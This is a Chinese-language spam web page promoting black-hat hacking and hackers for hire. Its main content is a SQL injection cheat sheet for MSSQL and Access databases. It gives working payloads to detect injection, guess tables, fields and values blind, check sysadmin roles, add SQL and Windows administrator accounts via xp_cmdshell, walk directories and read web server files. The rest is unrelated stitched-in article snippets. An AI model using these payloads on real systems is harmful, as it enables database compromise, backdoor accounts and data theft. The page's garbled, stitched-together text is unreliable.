黑客大户的联系方式-黑帽黑客入门(如何成为黑客 基础入门
1.判断是否有注入
;and 1=1
;and 1=2
2.初步判断是否是mssql
;and user>0
3.注入参数是字符
'and [查询条件] and ''='
4.搜索时没过滤参数的
'and [查询条件] and '%25'='
5.判断数据库系统
;and (select count(*) from sysobjects)>0 mssql
;and (select count(*) from msysobjects)>0 access
6.猜数据库
;and (Select Count(*) from [数据库名])>0
7.猜字段
;and (Select Count(字段名) from 数据库名)>0
8.猜字段中记录长度
;and (select top 1 len(字段名) from 数据库名)>0
9.(1)猜字段的ascii值(access)
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0
(2)猜字段的ascii值(mssql)
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0
10.测试权限结构(mssql)
;and 1=(Select IS_SRVROLEMEMBER('sysadmin'));--
;and 1=(Select IS_SRVROLEMEMBER('serveradmin'));--
;and 1=(Select IS_SRVROLEMEMBER('setupadmin'));--
;and 1=(Select IS_SRVROLEMEMBER('securityadmin'));--
;and 1=(Select IS_SRVROLEMEMBER('diskadmin'));--
;and 1=(Select IS_SRVROLEMEMBER('bulkadmin'));--
;and 1=(Select IS_MEMBER('db_owner'));--
11.添加mssql和系统的帐户
;exec master.dbo.sp_addlogin username;--
;exec master.dbo.sp_password null,username,password;--
;exec master.dbo.sp_addsrvrolemember sysadmin username;--
;exec master.dbo.xp_cmdshell 'net user username password /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--
;exec master.dbo.xp_cmdshell 'net user username password /add';--
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';--
12.(1)遍历目录
;create table dirs(paths varchar(100), id int)
;insert dirs exec master.dbo.xp_dirtree 'c:\'
;and (select top 1 paths from dirs)>0
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>)
(2)遍历目录
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树结构
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容
相关文章
微信 新规正式确认了,这两大功能不再免费,网友:真坑!
每日好文 互联网技术在社会发展中的普及化,交友软件手机微信充分发挥着关键的功效。现如今的手机微信不但具备强劲的社交媒体作用,并且还具备关键的手机支付作用,和支付宝钱包做市场竞争。依据有关数据信息...
黑客恢复qq,黑客技术 网络知识书籍、,黑客技术盗微信密码
[1][2]黑客接单 intent-filter> 103.47.168[.]172:4490001055c r __FRAME_END__低本钱却能换成高的转化率,有这么好的事,当然许多人排...
打火机掉了是什么段子 打火机掉了什么意思
近期抖音上盛行“火机没了”的搞笑段子,让许多人不了解道什么意思,这一梗早已产生了抖音短视频的暗语,提示你留意看他人的喜爱著作,火机没了是啥搞笑段子?火机掉了什么意思?下边产生详细介绍。 火机没了...
网上找黑客帮忙找号码-黑客黑的是手机还是手机号吗(黑客知道手机号能入侵手机吗)
网上找黑客帮忙找号码相关问题 黑客学渣相关问题 黑客一般使用什么工具 攻击一个网站(攻击一个网站的成本) 黑客和...
海岛纪元什么职业厉害 海岛纪元各职业玩法详解
海岛纪元什么职业比较厉害?海岛纪元最近正式开服,游戏虽然玩法比较特殊,但是还是有着大家比较熟悉的职业玩法机制。而每个职业自然也有着不同的优势和玩法,很多玩家都不是很清楚每个职业的具体不同点吧,下面我们...
如何建立百度百科词条(百度百科创建词条不通过)
第一,开篇 对于那些想通过网络营销获得财富的涉足互联网的公司来说,百度百科词条的创建已经成为必不可少的一部分,也是必须占据的一块领地:公司名称、品牌名称等等。初学者可以做,但他们总是尝试!】企...
Copyright Your WebSite.Some Rights Reserved.
免责声明:本站所发布的任何网站,全部来源于互联网,版权争议与本站无关。仅供技术交流,如有侵权或不合适,请联系本人进行删除。不允许做任何非法用途!